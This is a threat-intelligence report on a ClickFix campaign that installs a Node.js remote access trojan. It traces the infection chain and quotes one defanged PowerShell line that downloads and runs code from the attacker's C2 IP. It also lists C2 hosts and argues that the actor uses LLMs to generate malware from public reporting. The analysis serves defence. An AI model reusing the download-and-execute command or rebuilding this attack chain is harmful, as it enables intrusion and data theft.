ClickFix to NodeJS RAT

This command line downloads and executes cloudflare-service.msi in memory, which fakes a .NET runtime error and executes an embedded PowerShell script run-script.ps1.

Then, the run-script.ps1 downloads and executes the next stage via the command line:

"iwr "http[:]//93[.]113[.]25[.]102/779461502770a6d2' -UseBasicParsing | iex”

Hosted at “http://93[.]113[.]25[.]102/779461502770a6d2” is additional PowerShell that performs the following:

• Sends initial beacon to C2 indicating a newly compromised host
• Downloads and installs the official Node.js v22.16.0 runtime
• Downloads “index.js” from https[:]//amphetamine[.]kyun[.]li?cid=779461502770a6d2 and executes it with node

The initial index.js script is heavily obfuscated, which was likely done via the open-source JavaScript obfuscator at https[:]//obfuscator[.]io/. Thankfully, the threat actor was kind enough to leave the main() function unobfuscated, enabling BlueVoyant to quickly cut through ~7,000+ lines of nonfunctional JavaScript. 

In our analysis, BlueVoyant researchers observed only a few purposeful helper functions, namely “hc”, “ClientRequestImpl”, “AddAutoRun”, and “runModule”. Functions “hc” and “ClientRequestImpl” are utilized to construct client-side functionality for interacting with a remote command and control (C2) domain. The “hc” function leverages ClientRequestImpl to construct and execute the underlying HTTP requests. 

“AddAutoRun” adds a persistence mechanism on the compromised host, ensuring that a malicious .LNK file is added to the user’s Startup folder, and upon user login, will execute a hidden PowerShell window launching index.js from its installation directory via node.exe.

The last helper function observed, “runModule”, is used to dynamically load a JavaScript module and executes that module's index.js by piping it into a Node.js child process. It will capture the logs and returns its final exit code. This function determines if the UAC bypass is necessary and if it will execute in main().

Upon execution of main(), we observed the download and execution of the final index.js payload. This final payload consists of 22,000+ lines of JavaScript and is capable of:

• Remotely executing PowerShell
• Shellcode loading
• Restarting processes with a UAC bypass
• Install and execute executables, dlls, and MSI packages
• Dump Outlook
• Act as a SOCKS5 Proxy

This index.js payload utilizes various API endpoints at http[:]//93[.]113[.]25[.]102/ to enable these capabilities.

A Sign of Things to Come...

BlueVoyant has tracked this ongoing cyber campaign since it began in early October and assesses that it likely exemplifies the evolving tactics of modern, lower-skilled threat actors, empowered by accessible technology. The operation begins with a ClickFix social engineering lure but distinguishes itself through the deployment of a sophisticated, modular Remote Access Trojan (RAT) written in Node.js.

The attack chain is consistent with previously documented ClickFix attacks, which BlueVoyant continuously encounters. A user is tricked into pasting a command that fetches a malicious MSI installer from the static C2 IP 93.113.25[.]102. This MSI file, disguised behind a fake .NET error, executes a PowerShell script that beacons to the C2, installs the official Node.js runtime, and ultimately executes the obfuscated RAT. The core payload establishes persistence via a Startup folder LNK file and provides a full suite of capabilities, including remote code execution, SOCKS5 proxying, and UAC bypass.

Analysis of the campaign's infrastructure and artifacts reveals a threat actor deeply entrenched in a rapid development and testing cycle. The list of downloaded MSI files—including cloudflare-service.msi, GearUP-2.48.1-win.msi, test-vt.msi, and vt-test.msi—tells a story of iterative testing and evasion refinement. The use of legitimate-sounding names like node-v22.19.0-x64.msi and cloudflare-turnstile.msi shows a strategic effort at social engineering, while the blatant test-vt.msi filename may indicate active and somewhat careless testing against security scanners like VirusTotal.

This developer-centric focus is further evidenced by the actor's infrastructure choices. While relying on a single, hard-coded C2 IP, they employ a variety of alphanumeric paths (e.g., /779461502770a6d2) for payload retrieval and have begun experimenting with additional lure-echoing domains (cloudflare-svc.kyun.li, cloudflare.kyun.li) alongside the primary domains leveraged earlier in the campaign (amphetamine.kyun.li, methadone.kyun.li).

A revealing aspect of the actor's profile is found within the code itself. The malware is heavily obfuscated with a public tool (obfuscator[.]io), yet key function names were left exposed, indicating a developmental oversight. More significantly, the scripts are filled with verbose, explanatory comments in Russian, such as “Ждем завершения других процессов CMSTP” (“Waiting for other CMSTP processes to complete”) and “# Альтернативный подход - использовать случайную задержку” (“# An alternative approach is to use a random delay”). This pattern of over-explanation, coupled with extensive debugging console logs, is a known signature of LLM-generated code.

BlueVoyant, therefore, assesses with medium confidence that this campaign is operated by a Russian-speaking threat actor, but that’s not the full story. In fact, this actor may represent a new class of "LLM-Enabled Developer"—those possessing the foundational knowledge to orchestrate a complex attack chain and implement AI-generated code but lack the advanced tradecraft of a seasoned malware author. Their reliance on public tools, iterative testing practices, and poor OPSEC (e.g., a static C2 IP, revealing filenames) points to a primary focus on functionality and evasion over long-term stealth.

To arrive at this conclusion, BlueVoyant analysis found this campaign potentially represents a sort of operational extension of previously documented Node.js-based threat activity publicly reported by Sekoia TDR, Red Canary and Trustwave researchers. Like the attacks and malware described there, this campaign also integrates the established KongTuke traffic direction system to funnel victims from compromised websites to the ClickFix landing pages. Furthermore, the core objective and final payload remain consistent with the goal being the deployment of a sophisticated Node.js-based RAT capable of remote execution, SOCKS5 proxying, and data exfiltration.

BlueVoyant’s investigation, however, reveals that this specific intrusion represents a distinct, parallel branch of development by a different threat. The key divergence occurs after the KongTuke redirection. Instead of the previously seen PowerShell commands fetching a ZIP file, this campaign executes a unique command to download a malicious MSI installer from a static, hard-coded IP (93.113.25.102), which then presents a fake .NET error. Furthermore, while persistence is maintained, the method shifts from the mature actor's consistent use of a Windows Registry Run key to a less stealthy .LNK file in the Startup folder.

The most telling differences are in the code itself and the operational security where this campaign exhibits the hallmarks of an “LLM-enabled developer”. The JavaScript is heavily obfuscated with a public tool yet contains exposed function names and verbose comments in Russian. Additionally, the infrastructure shows evidence of careless testing (e.g., test-vt.msi), and the actor relies on a single static C2 IP. This contrasts sharply with the sophisticated, evolving infrastructure and robust anti-analysis checks highlighted in the aforementioned research. 

The documented success of such attacks in open-source research may have been the rationale for copying their work. The TTPs may have provided a complete blueprint for a copy-cat Node.js-based intrusion, a blueprint perfectly suited for AI-powered mimicry. The consistency of this modular process—from initial redirect to final RAT capabilities—makes it an ideal template for an LLM. A threat actor could feed these reports to an AI to automatically generate new, polymorphic variants of each stage, creating functionally identical malware that replicates this proven, successful attack chain. This pattern suggests the mature TTPs of established and/or successful threat groups are likely serving as a veritable recipe book for a new wave of LLM-enabled actors, who can effectively clone the functional components of a sophisticated attack while introducing operational noise that obscures their origins and complicates attribution.

Conclusion

This campaign exemplifies a significant shift in the cyber threat landscape, where the barrier to entry for conducting sophisticated attacks continues to lower rapidly. This operation is not a product of a top-tier, state-sponsored actor but rather the likely output of an "LLM-Enabled Developer"—a lower-to-mid-tier threat actor leveraging publicly documented techniques and AI-generated code to bootstrap their capabilities. By replicating the proven KongTuke-to-NodeJS-RAT kill chain, this actor demonstrates how open-source threat reporting can be weaponized, providing a blueprint for less skilled adversaries to emulate.

A fundamental takeaway is that the playbook is now publicly accessible to the layperson. The meticulous analyses published by the cybersecurity community, intended to illuminate and defend against threats, may conversely provide a step-by-step guide for aspiring malware authors. When this detailed playbook is combined with the power of LLMs, the result is a dangerous proliferation of capable threats. Vigilance against these underlying TTPs, rather than their constantly changing implementations, is the most effective defense against this new era of AI-powered, copycat threats.

For organizations seeking to defend against this evolving threat, several key takeaways emerge. First, user awareness remains a critical first line of defense. Continuous training on social engineering tactics, specifically the hallmarks of ClickFix lures (e.g., prompts to press Win+R and paste commands), is essential to disrupt the initial infection chain. Second, technical controls must evolve from hunting static indicators to detecting behavioural patterns. To aid this effort, BlueVoyant has developed advanced detection content designed to identify TTPs used in this campaign. Finally, the security community must recognize the dual edge of transparency. While vital for collective defense, detailed public reporting provides a template for adversaries to fast-track successful attacks via the use of LLMs; this necessitates a proactive hunting posture focused on TTPs and a mature assumption that proven attack chains will be rapidly adopted and adapted by the emerging generation of LLM-enabled threat actors.